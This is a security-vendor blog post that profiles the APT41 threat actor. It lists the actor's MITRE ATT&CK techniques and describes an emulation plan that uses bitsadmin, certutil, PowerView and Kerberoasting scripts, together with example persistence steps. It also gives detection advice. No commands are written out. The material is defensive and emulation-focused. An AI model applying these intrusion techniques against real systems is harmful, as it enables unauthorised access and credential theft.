Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared to the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan in our Github, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.

    Cyber Threat Intelligence

    APT41 is a Chinese actor first seen active in 2012 and has been observed in a broad ranging campaign through 2020. Its intent has been both for state-sponsored espionage as well as for financial reasons. After exploitation, APT leverages sophisticated TTPs and even deploys additional payloads with multiple different methods such as bitsadmin and certutil. It also looks to evade defenses and establish persistence, making it an incredibly dangerous piece of malware. 

    Cyber Threat Intelligence Sources: 

    Many of these TTPs have been discussed in previous #ThreatThursdays so we want to focus on some new ones. In the adversary emulation part section we will discuss:

    • Execution Guardrails - restricting the payload to only execute within a particular domain environment
    • Bitsadmin - to download a payload
    • Certutil - to download a payload
    • PowerView.ps1 - PowerShell script to gain situational awareness on a domain

    Adversary Emulation Plan

    After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:




    Initial Access

    T1190 - Exploit Public-Facing Application

    T1566 - Phishing

    T1566.001 - Spearphishing Attachment

    T1195 - Supply Chain Compromise

    T1195.002 - Compromise Software Supply Chain

    Command and Control

    T1071 - Application Layer Protocol

    T1071.004 - DNS

    T1071.002 - File Transfer Protocols

    T1071.001 - Web Protocols

    T1568 - Dynamic Resolution

    T1568.002 - Domain Generation Algorithms

    T1008 - Fallback Channels

    T1105 - Ingress Tool Transfer

    T1104 - Multi-Stage Channels

    T1090 - Proxy

    T1102 - Web Service

    T1102.001 - Dead Drop Resolver


    T1560 - Archive Collected Data

    T1560.001 - Archive via Utility

    T1056 - Input Capture

    T1056.001 - Keylogging


    T1059 - Command and Scripting Interpreter

    T1059.001 - PowerShell

    T1059.003 - Windows Command Shell

    T1059.004 - Unix Shell

    T1203 - Exploitation for Client Execution

    T1053 - Scheduled Task/Job

    T1053.005 - Scheduled Task

    T1569 - System Services

    T1569.002 - Service Execution

    T1047 - Windows Management Instrumentation

    Defense Evasion

    T1197 - BITS Jobs

    T1480 - Execution Guardrails

    T1480.001 - Environmental Keying

    T1070 - Indicator Removal on Host

    T1070.001 - Clear Windows Event Logs

    T1070.003 - Clear Command History

    T1070.004 - File Deletion

    T1036 - Masquerading

    T1036.005 - Match Legitimate Name or Location

    T1112 - Modify Registry

    T1027 - Obfuscated Files or Information

    T1542 - Pre-OS Boot

    T1055 - Process Injection

    T1014 - Rootkit

    T1218 - Signed Binary Proxy Execution

    T1218.001 - Compiled HTML File

    T1553 - Subvert Trust Controls

    T1553.002 - Code Signing

    T1078 - Valid Accounts

    Credential Access

    T1110 - Brute Force

    T1110.002 - Password Cracking

    T1003 - OS Credential Dumping

    T1003.001 - LSASS Memory


    T1547 - Boot or Logon Autostart Execution

    T1547.001 - Registry Run Keys / Startup Folder

    T1136 - Create Account

    T1136.001 - Local Account

    T1543 - Create or Modify System Process

    T1543.003 - Windows Service

    T1133 - External Remote Services

    T1574 - Hijack Execution Flow

    T1574.002 - DLL Side-Loading

    T1542.003 - Bootkit


    T1083 - File and Directory Discovery

    T1046 - Network Service Scanning

    T1135 - Network Share Discovery

    T1016 - System Network Configuration Discovery

    T1049 - System Network Connections Discovery

    T1033 - System Owner/User Discovery

    Privilege Escalation

    T1546 - Event Triggered Execution

    T1546.008 - Accessibility Features

    Lateral Movement

    T1021 - Remote Services

    T1021.001 - Remote Desktop Protocol


    T1486 - Data Encrypted for Impact

    T1496 - Resource Hijacking

    As usual, we created and shared the APT41 adversary emulation plan on our Github in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke down the threat into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check if the payload is running with high integrity (administrative privilege). If it is running with privilege, it takes additional steps than if it is not running with privilege.


    APT41 leverages the well-known powershell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1 There are multiple ways to download and execute this script in memory but in this case, we are going to download the script to the disk and then call the script to run various commandlets it provides:

    Defense Evasion with bitsadmin and certutil

    APT41 uses two well known living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system and have some added functionality. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known powershell scripts for Kerberoasting and Domain Enumeration.

    To maintain our non-destructive philosophy of emulation, we showed the ability to download example payloads and execute PowerShell commands without necessarily running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks so that they would be easily distinguishable and removable.

    All of the above steps for persistence may be done by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process, if it is a high integrity process, then it performs other persistence and credential access TTPs that require administrative privileges:

    After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.

    Defend against APT41

    While APT41 has quite the span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it. 

    Additional Payload Download

    APT41 has a few methods of downloading additional payloads: powershell, certutil, and bitsadmin. These are known as living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system. Preventing their execution is very difficult so it is best to enable detection and alerting controls when they are used to access external resources.

    Public PowerShell Scripts

    APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:

    • PowerView.ps1
    • WmiExec.ps1
    • ASREPRoast.ps1
    • SharpHound.ps1

    In this case, we did not modify the scripts, creating detection for the exact script known to be used by malicious actors may be an easy and effective way to detect this activity. There are many ways around it but this detection is a start.


    An alarming method that APT41 does to establish persistence on a victim is that it will look to create a user. To defend against this would require a group policy to disallow users from creating another user. Another method of persistence that is even more specific to APT41 is that it looks to create a service called “StorSyncSvc”. Detecting this service creation immediately (if the malware had somehow elevated privileges) would help defend against it.


    While APT41 is quite the sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.

    This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

    About SCYTHE

    SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io

    Post by Sean
    October 15, 2020